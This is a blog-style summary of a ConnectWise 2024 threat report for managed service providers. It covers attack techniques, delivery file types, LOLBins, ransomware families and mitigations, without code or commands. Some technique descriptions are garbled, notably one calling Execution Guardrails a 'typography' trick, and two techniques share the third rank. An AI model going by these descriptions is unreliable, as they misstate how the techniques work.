ConnectWise Threat Report Highlights: What to Watch in the Year Ahead

ConnectWise released their 2024 Threat Report for the MSP landscape. You can find the 42-page report here. If you're looking for the TLDR (too long, didn't read) version, then you're in the right place. This article will attempt to take a 42 page report and capture as much as possible in 1 page (ish).

This article will recap:

• Top Security Threats
• Popular techniques along with their trends year-over-ear
• Continuous vulnerabilities on the rise
• Growth in ransomware attacks

To quote the Late CEO of Intel, Andy Grove, "Success breeds complacency. Only the paranoid survive"

Let's jump into it.

Top 3 Threats

• Outdated software and Microsoft Windows Server 2012 reaching end of life
• Vulnerabilities related to endpoint protection and WFH here to stay
• Growth in ransomware attacks

Attack Techniques and Trends

We won't focus on all techniques here, but rather the top two techniques as well as techniques on the rise from threat actors.

The top 2 spots remain unchanged year-over-year from 2022 to 2023.

1. Exploitation for Client Execution: this exploits client apps or software vulnerabilities & executes malicious code. Will take advantage of commonly used programs like Adobe or MS apps to gain access to system.
2. Registry Run Keys: manipulates Windows run keys or startup folder to gain persistence. Malware automatically launches with each subsequent startup.

The top 3 threats trending up year-over-year.

• Execution Guardrails (rose from no.9 in 22' to no.3 in 23'): leverages typography to derive encryption from decryption keys from network shares, physical devices, software versions, IP addresses, or files.
• Valid Accounts (rose from no.8 in 22' to no.3 in 23'): entails threat actors using gaining access and using legitimate accounts to gain access to systems. User can blend in with normal behavior and then unleash malicious code, download additional payloads, or move unilaterally across the network.
• Obfuscated Files (rose to no.5 while previously not making the top 10): involves threat actors using various methods such as obfuscated PowerShell scripts to conceal malicious aspects of their payload.

Vulnerabilities & Threats on The Rise

Known Vulnerabilities

This next image is by no means all of the vulnerabilities that are out there, but here are the most known with existing patches available.

For more details on each, be sure to download the full report.

Drive-By Compromises & SEO Poisoning Threats

A drive-by compromise happens when a victim visits a website and the user downloads a malicious file. Actors set up a malicious website, optimize the pages for SEO to increase site traffic, and then have malicious kits ready for consumption.

Malvertising Threats

You guessed it: online ads that threat actors pay for to serve audiences and drive traffic. This helps them appear less malicious while ultimately driving users to their malicious sites.

To protect against this, it's best to be on the lookout for paid content and go directly to the website anytime you may be attempting to download a file.

Trending Malware Delivery File Types

Starting in 2022, Microsoft no longer allowed you to run macros on any Word or Excel file if it's downloaded from the internet. However with one security gap closed, actors find new ways to prevail by delivering new file types. These include:

• Microsoft OneNote
• LNK
• Password protected Zip
• JavaScript Distributed with HTML
• MSIX

Living-off-the-landbinaries (LOLBins)

LOLBins are pre-installed executables living on most systems or downloads through Microsoft. Since the file types discussed in the previous section have become harder to utilize, actors turn to tools that are already present in the environment to get the job done. These include:

• PowerShell
• Wscript
• Rundll32
• Certutil

It's important to monitor these binaries and file types for any daily activity that is outside the norm for your users.

Ransomware

We couldn't close out this post without mentioning, you guessed it, Ransomware. It continues to have the most impact on Cyber threats for small-to-mid size businesses and the managed service providers that handle the SMB. In fact, over $1Billion in ransomware payments were collected in 2023.

Here's the chart to highlight the trend.

Here's a list of the top 5 Ransomware sighted in 2023

• LockBit
• PLAY Ransomware
• BlackCat/ALPHV
• 8base
• CI0P

Fun (well, not so fun) fact. Events tend to spike the most in July/August as folks are on vacation, away from their desk, or attempting to enjoy the few short summer months.

Closing Out

This page briefly highlights the threats and techniques that are being used in the expanding threat landscape. It's important to further dive into the report or reach out to your Managed Services Provider to discuss mitigation efforts.

Some things to keep in mind as you seek to mitigate your threat exposure through 2024 and beyond.

• Regularly patch machines
• Deploy endpoint detection and response (EDR), and managed detection and response (MDR) solutions for additional layers of security
• Leverage immutable backups
• Train employees internally on the threats out there and how actors operate